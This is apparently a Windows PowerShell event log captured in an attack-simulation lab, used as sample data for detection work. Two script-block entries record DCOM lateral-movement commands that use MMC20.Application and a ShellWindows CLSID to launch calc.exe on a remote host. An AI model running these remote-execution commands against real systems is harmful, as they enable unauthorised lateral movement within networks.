11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639283 Keywords=None Message=Completed invocation of ScriptBlock ID: 819085bd-5f95-489d-a836-6838c03cc72f Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639282 Keywords=None Message=Started invocation of ScriptBlock ID: 819085bd-5f95-489d-a836-6838c03cc72f Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639281 Keywords=None Message=Creating Scriptblock text (1 of 1): $global:? ScriptBlock ID: 819085bd-5f95-489d-a836-6838c03cc72f Path:
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639280 Keywords=None Message=Completed invocation of ScriptBlock ID: 94cfa320-c593-4dbc-b9fb-3a4a4183e40b Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639279 Keywords=None Message=Started invocation of ScriptBlock ID: 94cfa320-c593-4dbc-b9fb-3a4a4183e40b Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=3 Type=Warning ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639278 Keywords=None Message=Creating Scriptblock text (1 of 1): [activator]::CreateInstance([type]::GetTypeFromProgID(‘MMC20.application’,’10.0.1.15’)).Document.ActiveView.ExecuteShellCommand(‘c:\windows\system32\calc.exe’, $null, $null, ‘7’) ScriptBlock ID: 94cfa320-c593-4dbc-b9fb-3a4a4183e40b Path:
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40962 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Stop RecordNumber=639277 Keywords=None Message=PowerShell console is ready for user input
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=53504 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Named Pipe IPC OpCode=Open (async) RecordNumber=639276 Keywords=None Message=Windows PowerShell has started an IPC listening thread on process: 1604 in AppDomain: DefaultAppDomain.
11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40961 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Start RecordNumber=639275 Keywords=None Message=PowerShell console is starting up
11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639288 Keywords=None Message=Started invocation of ScriptBlock ID: 9a8af736-a125-4025-886f-518418002e0d Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b
11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=3 Type=Warning ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639287 Keywords=None Message=Creating Scriptblock text (1 of 1): [activator]::CreateInstance([type]::GetTypeFromCLSID(‘C08AFD90-F2A1-11D1-8455-00A0C91F3880’,’10.0.1.15’)).Document.Application.ShellExecute(‘cmd.exe’,’/c calc.exe’,’C:\windows\system32’,$null,0) ScriptBlock ID: 9a8af736-a125-4025-886f-518418002e0d Path:
11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40962 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Stop RecordNumber=639286 Keywords=None Message=PowerShell console is ready for user input
11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=53504 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Named Pipe IPC OpCode=Open (async) RecordNumber=639285 Keywords=None Message=Windows PowerShell has started an IPC listening thread on process: 6076 in AppDomain: DefaultAppDomain.
11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40961 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Start RecordNumber=639284 Keywords=None Message=PowerShell console is starting up
11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639292 Keywords=None Message=Completed invocation of ScriptBlock ID: aa5cf934-2d4e-4c77-ba7d-261522a86717 Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b
11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639291 Keywords=None Message=Started invocation of ScriptBlock ID: aa5cf934-2d4e-4c77-ba7d-261522a86717 Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b
11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639290 Keywords=None Message=Creating Scriptblock text (1 of 1): $global:? ScriptBlock ID: aa5cf934-2d4e-4c77-ba7d-261522a86717 Path:
11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639289 Keywords=None Message=Completed invocation of ScriptBlock ID: 9a8af736-a125-4025-886f-518418002e0d Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b